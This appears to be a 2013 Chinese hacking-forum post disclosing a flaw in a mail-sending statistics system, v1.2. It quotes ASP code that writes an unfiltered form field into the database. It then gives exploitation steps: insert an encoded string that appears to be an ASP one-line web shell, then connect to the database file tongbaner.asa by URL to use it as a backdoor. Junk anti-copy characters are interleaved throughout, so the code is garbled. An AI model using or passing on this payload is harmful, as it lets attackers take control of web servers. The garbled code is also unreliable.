找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2052|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
5 i5 Y; P- @. D: l) t
1 x& G0 O; C, \* |, K6 dIF Request.QueryString("Action")="del" Then
4 l1 ?; y6 r( y0 r9 p: P# \! s9 |ID=Request.QueryString("ID") 9 r" G* Y" m  m( M/ }7 Z
IF Countss ("tui","Fenlei",ID )<>0 then
, e8 ^. A4 i" j& ^0 a'略 7 Q" b- w9 _+ C. }# Y* Q2 h5 J% F
IF Request.QueryString("Action")="Add" Then
& m, ?# G6 B7 z, ATname=Request.Form("Typename") ' A6 Q5 P6 C9 o
Set Rs=Server.CreateObject("adodb.Recordset") 7 ^* N9 {2 M" f) E$ t. b( s
Sql="Select * From Fenlei Order by id Desc "
% g! E: L# L/ U( W8 \$ b. V" H$ XRs.Open Sql,Conn,1,3 # x" }! H2 D/ j  A: S$ m) `( {
Rs.Addnew
( q( v; v0 p4 V4 k# KRs("Typename")=Tname
+ e( i* j; U4 y7 ~7 g'略
/ N! q7 H2 b4 Y/ d) ]1 F5 }1 L+ xSet Rs=Server.CreateObject("adodb.Recordset") ; a! }: k9 |% v) M6 b' I
Sql="Select * From Fenlei Order by id Desc " $ [2 H3 ]9 l8 Z0 w
Rs.Open Sql,Conn,1,1
$ h  T! S6 a& V* W" \. l" n'略 ( h/ V7 B9 ?; h4 i6 Q
%>4 x: n  V1 ?5 g0 ~0 a/ f6 S

0 e! y- s7 F0 e3 { , d1 _' @- I8 p, U

' B1 a! Z* U+ `+ ~没有过滤,直接写入数据库。2 W! r- B% s4 H' l) Q( c! a8 d

# x9 c% x! B, y" _利用方法:) [  c3 S4 T+ c3 e" w

8 @# B' ~5 r9 T+ R4 c6 I( H插入:┼攠數畣整爠煥敵瑳∨≡┩>
1 @( U7 j- i- Z1 ~ % o2 {( N; |. q5 k1 z1 a- f( \

3 J2 d  ^; P+ r- z3 j# g  h连接: http://www.xxx.com/###tongbaner.asa   B7 t: O9 i! j! {
'默认安装文件:
$ M7 V( y" V* p3 O2 ]'install.asp
9 O/ Q5 o/ f) \( D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表